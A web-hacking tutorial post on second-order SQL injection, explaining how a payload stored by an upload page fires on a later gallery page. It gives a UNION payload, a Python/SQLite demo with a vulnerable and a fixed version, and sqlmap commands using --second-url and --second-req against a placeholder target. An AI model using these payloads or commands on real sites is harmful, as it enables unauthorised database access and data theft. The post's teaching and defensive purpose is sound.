Week 37 - Second Order SQLi
This week’s web hacking tip is on Second-Order SQL injections!
I’m sure most of you are plenty familiar with standard SQLi, but did you know that the result of a payload does not always show up in the response to the request that carried it? Sometimes it only shows up on a completely different page. Let me explain...
Let’s say we have a web application that lets you upload a photo and give it a name. The name is stored in the database, and ‘view.php’ later lists every photo on the site with its name under it. Let’s also assume the photo name is the injection point, but in the second-order sense: the upload request stores whatever you send, and ‘view.php’ then drops that stored name straight into a query. The payload goes in with one request and only executes when a later request reads it back out.
Putting this all together, the only way to exploit it is to send the UNION-based payload in the upload request and then load ‘view.php’, which runs the query and displays all the photos. If all goes well, a payload like ‘+UNION+ALL+SELECT+1,2,@@version,4,5--+-’ (URL-encoded, and the column count has to match the query ‘view.php’ actually runs) will display something like ‘5.6.10’ as the name of the target photo on ‘view.php’.
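To make the mechanism concrete, here is an added example (not code from the original post) that models the two pages above as Python functions over an in-memory SQLite database. The schema, the ‘alice’/‘beach’ seed row and the payload are constructed for the demo; sqlite_version() stands in for MySQL’s @@version. upload_photo() uses a parameterised INSERT, so the first request is perfectly safe on its own; the vulnerable view_photos_vulnerable() then concatenates the stored name into a second query, and that is where the UNION fires. view_photos_fixed() shows the same page with the stored value bound as a parameter.

```python
import sqlite3

# Library version string; the SQL function sqlite_version() returns the same value,
# standing in for MySQL's @@version in this SQLite-backed demo.
SQLITE_VERSION = sqlite3.sqlite_version

# Constructed payload (hypothetical): closes the string, UNIONs the version in as the
# "name" column, and comments out the rest. Two columns because the view query
# selects two; the count has to match whatever the second-order query selects.
PAYLOAD = "' UNION ALL SELECT sqlite_version(), 'x'-- -"


def make_db():
    """Constructed schema and seed row standing in for the site's database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE photos (id INTEGER PRIMARY KEY, owner TEXT, name TEXT, path TEXT);
        INSERT INTO photos (owner, name, path) VALUES ('alice', 'beach', '/img/1.jpg');
        """
    )
    return conn


def upload_photo(conn, owner, name, path):
    """upload.php: parameterised, so the payload is stored verbatim and nothing fires yet."""
    conn.execute(
        "INSERT INTO photos (owner, name, path) VALUES (?, ?, ?)", (owner, name, path)
    )
    conn.commit()


def stored_names(conn, owner):
    """Reads the stored names back (safely, in upload order); both view variants start here."""
    rows = conn.execute(
        "SELECT name FROM photos WHERE owner = ? ORDER BY id", (owner,)
    )
    return [row[0] for row in rows]


def view_photos_vulnerable(conn, owner):
    """view.php, vulnerable: each stored name is concatenated into a second query.
    The value came from the database, so it looks trusted, but it is still user input."""
    captions = []
    for name in stored_names(conn, owner):
        sql = f"SELECT name, path FROM photos WHERE name = '{name}'"  # second-order sink
        for caption, _path in conn.execute(sql):
            captions.append(caption)
    return captions


def view_photos_fixed(conn, owner):
    """view.php, fixed: the stored value is bound as a parameter, so it is only ever data."""
    captions = []
    for name in stored_names(conn, owner):
        rows = conn.execute("SELECT name, path FROM photos WHERE name = ?", (name,))
        for caption, _path in rows:
            captions.append(caption)
    return captions


def demo():
    """Uploads the payload once, then renders the gallery with both view versions."""
    conn = make_db()
    upload_photo(conn, "alice", PAYLOAD, "/img/2.jpg")
    return view_photos_vulnerable(conn, "alice"), view_photos_fixed(conn, "alice")


if __name__ == "__main__":
    leaked, safe = demo()
    print("vulnerable view.php captions:", leaked)  # second caption is the DB version
    print("fixed view.php captions:     ", safe)    # second caption is the payload text
```

Running demo() gives a gallery where the vulnerable view renders the SQLite version string as the second photo’s name, exactly the ‘5.6.10’ effect described above, while the fixed view renders the payload as a literal caption. Note that nothing about the upload request itself looks injectable, which is why testing only the request that carries the payload misses this class of bug.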
Now how do we automate it? Luckily for us, sqlmap supports both --second-url and --second-req, which let you specify the second URL or request file that actually loads the payload result; sqlmap fetches it after each injection attempt and looks for the result there instead of in the upload response. So we issue the injection on 'upload.php', then load 'view.php' to get the result. If 'view.php' needs a session or other headers to render, use the request-file form so the cookies go with it:
Second request given as a URL: sqlmap -r upload_request.txt -p photoName --second-url "http[:]//victim[.]com/view[.]php"
Second request given as a request file: sqlmap -r upload_request.txt -p photoName --second-req view_request.txt
Keep this in mind next time you’re dumping a DB!